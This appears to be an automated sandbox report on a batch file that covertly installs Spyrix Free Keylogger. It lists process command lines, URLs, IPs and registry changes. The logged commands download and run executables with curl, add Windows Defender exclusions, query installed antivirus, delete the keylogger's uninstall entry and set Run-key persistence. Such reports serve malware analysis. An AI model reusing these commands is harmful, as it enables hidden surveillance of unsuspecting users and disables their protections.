C++ source, Unicode text, UTF-8 text
|
dropped
|
||
Chrome Cache Entry: 666
|
ASCII text, with very long lines (2720)
|
downloaded
|
||
Chrome Cache Entry: 667
|
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
Chrome Cache Entry: 668
|
Java source, ASCII text, with very long lines (1391)
|
downloaded
|
||
Chrome Cache Entry: 669
|
Java source, Unicode text, UTF-8 text, with very long lines (5161)
|
downloaded
|
||
Chrome Cache Entry: 670
|
ASCII text, with very long lines (5945)
|
downloaded
|
||
Chrome Cache Entry: 671
|
Java source, Unicode text, UTF-8 text, with very long lines (5161)
|
dropped
|
||
Chrome Cache Entry: 672
|
Java source, ASCII text, with very long lines (837)
|
downloaded
|
||
Chrome Cache Entry: 673
|
Java source, ASCII text, with very long lines (795)
|
downloaded
|
||
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 1034 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\c5WMpr1cOc.bat" "
|
||
C:\Windows\System32\reg.exe
|
reg query "HKU\S-1-5-19\Environment"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"
|
||
C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe
|
"C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\\eb90c874-90f1-477e-bf8d-92cb4599bdb5.cmd
|
||
C:\Windows\SysWOW64\reg.exe
|
reg query "HKU\S-1-5-19\Environment"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"
|
||
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe
|
"C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"
|
||
C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp
|
"C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp" /SL5="$30454,32862490,227328,C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]=
.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
|
||
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
/value"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
|
||
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
/value"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
|
||
C:\Windows\System32\reg.exe
|
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex"
/y
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\pswd.cmd
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
|
||
C:\Windows\System32\reg.exe
|
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex"
/y
|
||
C:\Windows\SysWOW64\regedit.exe
|
"regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix
Free Keylogger_is1"
|
||
C:\Windows\SysWOW64\reg.exe
|
"reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c plist.cmd
|
||
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
|
||
C:\Windows\SysWOW64\NETSTAT.EXE
|
netstat.exe -e
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_EE7E4705DD4AC06ADFE650C2CDC39BDD
https://spyrix.net/dashboard/prg-actions
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD
https://spyrix.net/dashboard/prg-actions
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_EE7E4705DD4AC06ADFE650C2CDC39BDD
https://spyrix.net/dashboard/prg-actions
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD
https://spyrix.net/dashboard/prg-actions
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 83
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 112
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 121
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 114
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 105
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 120
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\curl.exe
|
curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\l"
https://cdnbaynet.com/loader/link.php?prg_id=sfk
|
||
C:\Windows\SysWOW64\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]=
.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\wbem\WMIC.exe
|
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\wbem\WMIC.exe
|
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\taskkill.exe
|
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM
akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\taskkill.exe
|
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM
akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\chcp.com
|
chcp 65001
|
||
C:\Windows\SysWOW64\timeout.exe
|
timeout 20
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\timeout.exe
|
timeout 6
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1936,i,1509766979292889431,16591483089158193991,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\tasklist.exe
|
TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
|
||
C:\Windows\SysWOW64\find.exe
|
find "spm"
|
||
C:\Windows\SysWOW64\tasklist.exe
|
TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
|
||
C:\Windows\SysWOW64\find.exe
|
find "sem"
|
||
C:\Windows\SysWOW64\tasklist.exe
|
TASKLIST /FI "IMAGENAME eq spkl.exe" /FO CSV /NH
|
||
C:\Windows\SysWOW64\find.exe
|
find "spkl"
|
||
C:\Windows\SysWOW64\tasklist.exe
|
TASKLIST /FI "IMAGENAME eq clv.exe" /FO CSV /NH
|
||
C:\Windows\SysWOW64\find.exe
|
find "clv"
|
There are 75 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://www.jrsoftware.org/0
|
unknown
|
||
https://dashboard.spyrix.com/account/login-from-program?email=
|
unknown
|
||
https://api.dropbox.com/1/fileops/copy
|
unknown
|
||
https://dashboard.spyrix.com/account/login-from-program
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionstps://s
|
unknown
|
||
https://spyrix.net/usr/monitor/
|
unknown
|
||
https://Spyrix.net/dashboard/prg-list
|
158.69.117.119
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exen
|
unknown
|
||
https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
|
unknown
|
||
https://dashboard.spyrix.com/qqS
|
unknown
|
||
http://www.fontbureau.com/designers
|
unknown
|
||
http://www.indyproject.org/
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exem(ac
|
unknown
|
||
https://cdnbaynet.com/loader/link.php?prg_id=sfkM
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
|
unknown
|
||
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s108
|
23.109.93.100
|
||
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
http://www.spyrix.com/pro_upgrade.htm?lic=
|
unknown
|
||
https://cdnbaynet.com/loader/link.php?prg_id=sfkG
|
unknown
|
||
http://crl.certum.pl/ca.crl0:
|
unknown
|
||
https://cdnbaynet.com/loader/link.php?prg_id=sfkE
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
|
unknown
|
||
https://spyrix.net/dashboard/prg-actions
|
158.69.117.119
|
||
https://dashboard.spyrix.com/cdn.js
|
158.69.117.119
|
||
http://www.galapagosdesign.com/DPlease
|
unknown
|
||
http://www.myspace.com/search/
|
unknown
|
||
https://api.dropbox.com/1/fileops/create_folder?
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
|
95.181.182.182
|
||
http://www.zhongyicts.com.cn
|
unknown
|
||
https://swtb-download.spyrix-
|
unknown
|
||
https://www.spyrix.com
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsll
|
unknown
|
||
http://www.innosetup.com/
|
unknown
|
||
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/4047
|
unknown
|
||
https://spyrix.net/dashboard/proxy/upload
|
unknown
|
||
https://cdnbaynet.com/loader/link.php?prg_id=sfk%
|
unknown
|
||
https://api.dropbox.com/1/shares/dropbox
|
unknown
|
||
HTTPS://DASHBOARD.SPYRIX.COM/
|
unknown
|
||
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404E
|
unknown
|
||
https://api-content.dropbox.com/1/files/dropbox
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Modal-04ffda94.css
|
95.181.182.182
|
||
https://api-content.dropbox.com/1/files_put
|
unknown
|
||
http://www.carterandcone.coml
|
unknown
|
||
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
|
23.109.93.100
|
||
https://api.dropbox.com/1/oauth/request_token?
|
unknown
|
||
HTTPS://SPYRIX.NET/DASHBOARD/PRG-ACTIONS
|
unknown
|
||
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404l=
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js
|
95.181.182.182
|
||
https://spyrix.net/das
|
unknown
|
||
https://api.dropbox.com/1/metadata/sandbox
|
unknown
|
||
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
|
unknown
|
||
https://spyrix.net/usr/monitor/access.txt
|
unknown
|
||
http://www.actualkeylogger.com/help.html#registrate
|
unknown
|
||
http://www.ok.ru/dk?st.cmd=searchResult
|
unknown
|
||
http://repository.certum.pl/l3.cer0
|
unknown
|
||
https://api.dropbox.com/1/fileops/create_folder
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Regular-73dcaa51.woff2
|
95.181.182.182
|
||
https://cdn.cdndownload.net/dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js
|
95.181.182.182
|
||
http://html4/loose.dtd
|
unknown
|
||
http://www.founder.com.cn/cn/bThe
|
unknown
|
||
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsv
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsuu/
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfkf
|
unknown
|
||
http://neftali.clubdelphi.com/
|
unknown
|
||
http://.css
|
unknown
|
||
https://filedn.com
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate.module-c837805f.js
|
95.181.182.182
|
||
https://api.dropbox.com/1/fileops/copy?
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsuu7
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfko
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Button-ca236c00.css
|
95.181.182.182
|
||
http://www.typography.netD
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfkff
|
unknown
|
||
https://dashboard.actualkeylogger.com
|
unknown
|
||
http://vk.com/search
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/en-5393c481.js
|
95.181.182.182
|
||
http://vk.com/searchecp
|
unknown
|
||
http://www.actualkeylogger.com/buynow.html
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDL
|
unknown
|
||
http://www.fonts.com
|
unknown
|
||
http://www.sandoll.co.kr
|
unknown
|
||
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404k
|
unknown
|
||
http://.jpg
|
unknown
|
||
https://api.dropbox.com/1/fileops/move
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js
|
95.181.182.182
|
||
https://swtb-download.spy
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe7
|
unknown
|
||
http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsers
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe.
|
unknown
|
||
https://cdnbaynet.com/loader/link.php?prg_id=sfkX0
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe4
|
unknown
|
||
https://securcdn.com/loader/link.php?prg_id=sfkupowershell.exe
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeF
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Button.module-6d4e91b8.js
|
95.181.182.182
|
||
https://cdn.cdndownload.net/dashboard30/assets/ButtonText-ead06ca1.css
|
95.181.182.182
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
swtb-download.spyrix-sfk.com
|
167.114.14.168
|
||
spyrix.net
|
158.69.117.119
|
||
dashboard.spyrix.com
|
158.69.117.119
|
||
www.google.com
|
142.250.185.228
|
||
filedn.com
|
23.109.93.100
|
||
cl-e0469d03.edgecdn.ru
|
95.181.182.182
|
||
cdnbaynet.com
|
167.114.14.170
|
||
cdn.cdndownload.net
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
142.250.185.228
|
www.google.com
|
United States
|
||
192.168.2.4
|
unknown
|
unknown
|
||
167.114.14.168
|
swtb-download.spyrix-sfk.com
|
Canada
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
158.69.117.119
|
spyrix.net
|
Canada
|
||
167.114.14.170
|
cdnbaynet.com
|
Canada
|
||
95.181.182.182
|
cl-e0469d03.edgecdn.ru
|
Russian Federation
|
||
127.0.0.1
|
unknown
|
unknown
|
||
23.109.93.100
|
filedn.com
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
|
localSPM
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
|
localmon
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Owner
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Sequence
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EnumKreg\value
|
tid
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
RegFiles0000
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
RegFilesHash
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
|
kbdsprt
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
|
localSPM
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: Setup Version
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: App Path
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
InstallLocation
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: Icon Group
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: User
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: Language
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
DisplayName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
UninstallString
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
QuietUninstallString
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
DisplayVersion
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
NoModify
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
NoRepair
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
InstallDate
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
MajorVersion
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
MinorVersion
|
||
